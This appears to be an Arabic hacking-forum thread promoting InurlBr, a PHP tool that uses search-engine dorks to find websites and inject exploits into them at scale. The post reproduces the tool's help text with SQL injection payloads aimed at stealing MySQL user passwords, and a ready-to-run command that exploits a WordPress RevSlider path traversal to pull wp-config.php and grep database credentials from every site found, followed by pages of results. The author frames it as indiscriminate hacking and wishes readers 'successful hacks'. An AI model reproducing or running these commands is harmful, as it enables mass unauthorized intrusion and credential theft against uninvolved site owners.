1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ أداة ] [ InurlBr ]

الموضوع في 'قسم الأدوات' بواسطة AnonYmous-IQ, بتاريخ ‏8 فبراير 2015.

كاتب الموضوع : AnonYmous-IQ المشاهدات : 1,519 الردود : 15 ‏8 فبراير 2015
  1. غير متصل

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات
    ExpErt DeveloPer

    عضو منذ:
    ‏31 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    458
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:

    [​IMG]
    [​IMG]




    :ُeُe0W: كيف الحال يا رب الكل بخير ً#ٌ5oًًًُ.


    وبصحة وعافية :ُxe@:

    [​IMG]


    [ InurlBr ]


    أداة جبارة تفوقت على باقي الادوات بوقتها الحالي :ُeُek:


    [​IMG]


    [​IMG]


    برمجة الاداة _ البرازيل _


    تخصصت الاداة في احضار مواقع مصابة عشوائية

    سحب الكونفك عن طريق ثغرات الخ.....


    Help


    كود PHP:

     ______   __  __  __  __  ____    __       ____     ____       
    /\__  _\ /\ \/\ \/\ \/\ \/\  _`\ /\ \     /\  _`\  /\  _`\     \/_/\ \/ \ \ `\ \ \ \ \ \ \ \L\ \ \ \    \ \ \L\ \ \ \L\ \      \ \ \  \ \ , ` \ \ \ \ \ \ ,  /\ \ \  __\ \  _ <'\ \ ,  /       \_\ \__\ \ \`\ \ \ \_\ \ \ \ \ \ \L\ \ \ \L\ \ \ \ \      /\_____\ \_\ \_\ \_____\ \_\ \_\ \____/ \ \____/ \ \_\ \_\    \/_____/ \/_/\/_/\/_____/\/_/\/ /\/___/   \/___/   \/_/\/ /         _    _ ______ _      _____  | |  | |  ____| |    |  __ \| |__| | |__  | |    | |__) ||  __  |  __| | |    |  ___/| |  | | |____| |____| |    |_|  |_|______|______|_|                      -----------------------------------------------------------------------------------------------------------------------------------h--help   Alternative long length help command.--ajuda  Command to specify Help.--info   Information script. -q  Choose which search engine you want through [1...13]:     [options]:     1   - www.google.com     2   - www.bing.com     3   - br.search.yahoo.com     4   - www.ask.com     5   - search.hao123.com     6   - ajax.googleapis.com     7   - search.lycos.com     8   - busca.uol.com     9   - us.yhs4.search.yahoo.com     10  - pesquisa.sapo.pt     11  - www.dmoz.org     12  - www.gigablast.com     13  - web.search.naver.com     all - All search engines     Default:    1     Example: -q {op}     Usage:   -q 1              -q 5               Using more than one engine:  -q 1,2,5,6,11               Using all engines:      -q all      -p  Choose which proxy you want to use through the search engine:     Example: -p {proxy:port}     Usage:   -p localhost:8118              -p socks5://googleinurl@localhost:9050              -p http://admin:12334@172.16.0.90:8080   --tor-random Enables the TOR function, each usage links an unique IP.  -t  Choose the validation type: op 1, 2, 3     [options]:     1   - The first type uses default errors considering the script:     It establishes connection with the exploit through the get method.     demonstrativo: www.alvo.com/pasta/index.php?id={exploit}        2   -  The second type tries to valid the error defined by: -a='ALGO_DENTRO_ALVO'     It also establishes connection with the exploit through the get method     demonstrativo: www.alvo.com/pasta/index.php?id={exploit}        3   - The third type combine both first and second types:     Then, of course, it also establishes connection with the exploit through the get method     Demo: www.alvo.com{exploit}     Default:    1     Example: -t {op}     Usage:   -t 1          DEFAULT ERRORS:       CMS WORDPRESS, JDBC ERROR, MYSQL ERROR, MICROSOFT ERROR, ORACLE ERROR, POSTGRESQL ERROR,     ZEND FRAMEWORK ERROR, PHP ERROR, ASP ERROR, LUA ERROR, INDEFINITE ERROR    --dork Defines which dork the search engine will use.     Example: --dork {dork}     Usage:   --dork 'site:.gov.br inurl:php? id'     - Using multiples dorks:     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'  --exploit-get Defines which exploit will be injected through the GET method to each URL found.     Example: --exploit-get {exploit_get}     Usage:   --exploit-get '?´0x27;'      --exploit-post Defines which exploit will be injected through the POST method to each URL found.     Example: --exploit-post {exploit_post}     Usage:   --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'      --exploit-comand Defines which exploit/parameter will be executed in the options: --comand-vul/--comand-all.       The exploit-comand will be identified by the paramaters: --comand-vul/--comand-all como _EXPLOIT_             Ex --exploit-comand '/admin/config.conf' --comand-all 'curl -v _TARGET__EXPLOIT_'     _TARGET_ is the specified URL/TARGET obtained by the process     _EXPLOIT_ is the exploit/parameter defined by the option --exploit-comand.     Example: --exploit-comand {exploit-comand}     Usage:   --exploit-comand '/admin/config.conf'          -a  Specify the string that will be used on the search script:     Example: -a {string}     Usage:   -a '<title>hello world</title>'      -d  Specify the script usage op 1, 2, 3, 4, 5, 6.     Example: -d {op}     Usage:     -d 1 /URL of the search engine.              -d 2 /Show all the url.              -d 3 /Detailed request of every URL.              -d 4 /Shows the HTML of every URL.              -d 5 /Detailed request of all URLs.              -s  Specify the output file where it will be saved the vulnerable URLs.          Example: -s {file}     Usage:   -s your_file.txt      -o  Manually manage the vulnerable URLs you want to use from a file, without using a search engine.     Example: -o {file_where_my_urls_are}     Usage:   -o tests.txt  -m  Enable the search for emails on the urls specified.        -u  Enables the search for URL lists on the url specified.  --gc Enable validation of values ​​with google webcache.  --cms-check Enable simple check if the url / target is using CMS

     --comand-vul Every vulnerable URL found will execute this command parameters.     Example: --comand-vul {command}     Usage:   --comand-vul 'nmap sV -p 22,80,21 _TARGET_'              --comand-vul './exploit.sh _TARGET_ output.txt'              --comand-all Use this commmand to specify a single command to EVERY URL found.     Example: --comand-all {command}     Usage:   --comand-all 'nmap sV -p 22,80,21 _TARGET_'              --comand-all './exploit.sh _TARGET_ output.txt'                 Observation:       _TARGET_ will be replaced by the URL/target found, although if the user      doesn't input the get, only the domain will be executed.      _TARGETFULL_ will be replaced by the original URL / target found.      _EXPLOIT_  will be replaced by the specified command argument --exploit-comand.   The exploit-comand will be identified by the parameters --comand-vul / --comand-all as _EXPLOIT_
     --replace Replace values ​​in the target URL.    Example:  --replace {value_old[INURL]value_new}     Usage:   --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'              --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'              --replace 'index.aspx?id=[INURL]index.aspx?id=1%27´'
    [​IMG]

    Info


    [​IMG]



    [​IMG]



    مثلأ خلونا نستغل الثغرة للاختراق العشوائي مو الاسهداف




    Poc: /wp-admin/admin-ajax.php?action=revslide*r_show_image&img=../wp-config.php


    inurl:wp-content/plugins/revslider site:br





    عن طريق هل امر



    INURLBR ADVANCED CONTROL


    php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'




    النتيجة




    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php



    :ُie1:


    الاستغلال

    [YOUTUBE]wAdxznwhKGY[/YOUTUBE]


    للفائدة فقط طرح الفيديو من قبل في المنتدئ .. i:q1^:


    [​IMG]


    للاداة خواص كثيرة استكشفوها {1!$9}


    :ُeُ!e1:


    رابط تحميل الاداة


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]





    الاداة موجودة في النظام


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]





    ارجع واقول الاداة تمت برمجتها بقمة الاحترافية وجبارة لحد اقصئ لكن

    العيب الوحيد هو ليست للاداة واجهة رسومية مثل باقي الادوات


    :ُeُek:



    ً#ٌ5oًًًُ.ً#ٌ5oًًًُ.ً#ٌ5oًًًُ.ً#ٌ5oًًًُ.ً#ٌ5oًًًُ. اختراقات موفقة .... ً#ٌ5oًًًُ.ً#ٌ5oًًًُ.ً#ٌ5oًًًُ.ً#ٌ5oًًًُ.ً#ٌ5oًًًُ.




    [​IMG]
    [​IMG]



     


    جاري تحميل الصفحة...
  2. غير متصل

    • тнe нαғαʀ •
    V • I • P

    عضو منذ:
    ‏16 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    24
    نقاط الجائزة:
    الوظيفة:
    عطـآل - بطـأل
    الإقامة:

    رد: [ InurlBr ]

    سلآم عليكم ورحمة الله وبركاته
    عاشت الايادي صديقي شرح وآفي وكآفي
    بارك الله بيك وجعلة في ميزآن حسنآتك يآ طيب
    و تقبل تحياتي وتقديري لحضرتك

    [​IMG][​IMG]

     


  3. غير متصل

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات
    ExpErt DeveloPer

    عضو منذ:
    ‏31 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    458
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:

    رد: [ InurlBr ]

    {1!$7} {1!$7}{1!$7}{1!$7}{1!$7}{1!$7} {1!$7}

    وايدك حبيبي . شكرا لك
    على
    مرورك العطر يا عسل
    نورت الموضوع غلاية انت
    [​IMG]

    {1!$7} {1!$7}{1!$7}{1!$7}{1!$7}{1!$7} {1!$7}​
     


  4. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: [ InurlBr ]

    بارك الله بك ياطيب
    اداة جبارة
    ان شاء الله سأقوم بتجربة ما اذا كان من الممكن تثبيتها على الكالي
     


  5. غير متصل

    Mr.FriezA
    V • I • P

    عضو منذ:
    ‏10 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    22
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    رد: [ InurlBr ]

    تسلم عل طرح الاداه ^_^ انا استعمل هذذا النظام ومادري انه من جد فيه اداوت زي ذا والله تسلم حبي على الاداه
     


  6. غير متصل

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات
    ExpErt DeveloPer

    عضو منذ:
    ‏31 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    458
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:

    رد: [ InurlBr ]

    {1!$7}وبيك حبيبي ....MR.CAPTCHA.... شكرآ على مرورك يا احلى من العسل انت هههـ [​IMG]



    الاداة قابلة للتنصيب على اي نظام لينكس

    لو تعمقت اكثر راح تلاحظ المتطلبات ياالطيب



    • ----------------------------------------------------------
    • [+] PERMISSION EXECUTION: chmod +x inurlbr.php
    • [+] INSTALLING LIB CURL: sudo apt-get install php5-curl
    • [+] INSTALLING LIB CLI: sudo apt-get install php5-cli
    • [+] INSTALLING PROXY TOR
      عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    • ----------------------------------------------------------

    :{8!}:​
    :{8!}::{8!}::{8!}::{8!}::{8!}::{8!}::{8!}:​
     


  7. غير متصل

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات
    ExpErt DeveloPer

    عضو منذ:
    ‏31 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    458
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:

    رد: [ InurlBr ]

    {1!$8} نورت يالطيب ... MR.FRIEZA... {1!$8}

    {1!$7}{1!$7}{1!$7}{1!$7}{1!$7}{1!$7}{1!$7}​
     


  8. غير متصل

    security alqasem
    rankrank
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏26 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:

    رد: [ InurlBr ]

    عاشت ايدك
    دائما مبدع
    :{1!}:{1!$7}:{1!}:{1!$7}:{1!}:{1!$7}:{1!}:{1!$7}
     


  9. غير متصل

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات
    ExpErt DeveloPer

    عضو منذ:
    ‏31 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    458
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:

    رد: [ InurlBr ]

    [​IMG] , وايدكـ حبيبي شكرآ على مرورك العطر يا وردة {1!$7}​
     


  10. غير متصل

    wadedy
    rank
    Developer

    عضو منذ:
    ‏2 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: [ InurlBr ]

    راااااااائع يا صديقي شرح منظم اعجبني كثيرا
     


الوسوم:

مشاركة هذه الصفحة

جاري تحميل الصفحة...